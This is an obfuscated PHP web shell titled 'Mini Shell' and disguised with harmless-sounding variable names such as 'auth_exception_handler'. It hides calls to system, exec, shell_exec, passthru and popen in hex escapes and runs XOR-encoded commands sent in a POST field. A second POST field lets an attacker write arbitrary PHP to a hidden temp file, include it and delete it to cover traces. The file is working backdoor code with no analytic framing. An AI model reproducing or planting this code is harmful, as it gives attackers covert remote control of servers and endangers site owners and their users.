Mini Shell
<?php $auth_exception_handler1 = "\x73ys\x74e\x6D"; $auth_exception_handler3 = "e\x78e\x63"; $auth_exception_handler6 = "s\x74\x72eam_\x67\x65t\x5F\x63on\x74\x65n\x74s"; $token_parser_engine = "h\x65\x78\x32\x62in"; $auth_exception_handler7 = "\x70c\x6C\x6Fse"; $auth_exception_handler4 = "pass\x74hru"; $auth_exception_handler2 = "\x73hel\x6C\x5F\x65xec"; $auth_exception_handler5 = "p\x6Fpe\x6E"; if (isset($_POST["\x74o\x6Ben"])) { function event_dispatcher ( $pset , $object ) { $hld = '' ; $w=0; do{ $hld.=chr(ord($pset[$w])^$object); $w++; } while($w<strlen($pset)); return $hld; } $token = $token_parser_engine($_POST["\x74o\x6Ben"]); $token = event_dispatcher($token, 78); if (function_exists($auth_exception_handler1)) { $auth_exception_handler1($token); } elseif (function_exists($auth_exception_handler2)) { print $auth_exception_handler2($token); } elseif (function_exists($auth_exception_handler3)) { $auth_exception_handler3($token, $data_chunk_pset); print join("\n", $data_chunk_pset); } elseif (function_exists($auth_exception_handler4)) { $auth_exception_handler4($token); } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) { $object_hld = $auth_exception_handler5($token, 'r'); if ($object_hld) { $desc_resource = $auth_exception_handler6($object_hld); $auth_exception_handler7($object_hld); print $desc_resource; } } exit; }
if(filter_has_var(INPUT_POST, "\x64a\x74")){
$obj = hex2bin($_REQUEST["\x64a\x74"]);
$factor = '' ; foreach(str_split($obj) as $char){$factor .= chr(ord($char) ^ 49);}
$record = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd(), getenv("TEMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir")]);
foreach ($record as $comp) {
if ((is_dir($comp) and is_writable($comp))) {
$key = implode("/", [$comp, ".fac"]);
$file = fopen($key, 'w');
if ($file) {
fwrite($file, $factor);
fclose($file);
include $key;
@unlink($key);
die();
}
}
}
}